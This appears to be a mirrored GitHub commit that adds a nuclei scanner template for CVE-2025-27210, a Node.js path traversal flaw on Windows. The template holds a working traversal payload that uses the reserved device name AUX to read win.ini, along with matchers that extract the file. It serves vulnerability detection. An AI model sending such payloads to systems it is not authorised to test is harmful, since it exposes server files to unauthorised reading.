mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
Added template for cve-2025-27210
This commit is contained in:
36
cve-2025-27210.yaml
Normal file
36
cve-2025-27210.yaml
Normal file
@@ -0,0 +1,36 @@
|
||||
id: cve-2025-27210
|
||||
info:
|
||||
name: Node.js Windows Path Traversal
|
||||
author: MuhammadWaseem
|
||||
severity: high
|
||||
description: |
|
||||
This template detects a path traversal vulnerability in Node.js on
|
||||
Windows systems (CVE-2025-27210) by exploiting reserved device file
|
||||
names combined with traversal sequences.
|
||||
tags: path-traversal,windows,nodejs,vulnerability
|
||||
|
||||
variables:
|
||||
traverse_sequence: "../..\\" # Windows-style path traversal
|
||||
target_file: "Windows\\win.ini"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /{{traverse_sequence}}AUX\\..\\{{target_file}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "(?i)\\[windows\\]" # Matches content indicating the win.ini file
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "(?s)(\\[windows\\].*?)\\n\\n" # Extracts the content of the win.ini file
|
||||
group: 1
|
||||
Reference in New Issue
Block a user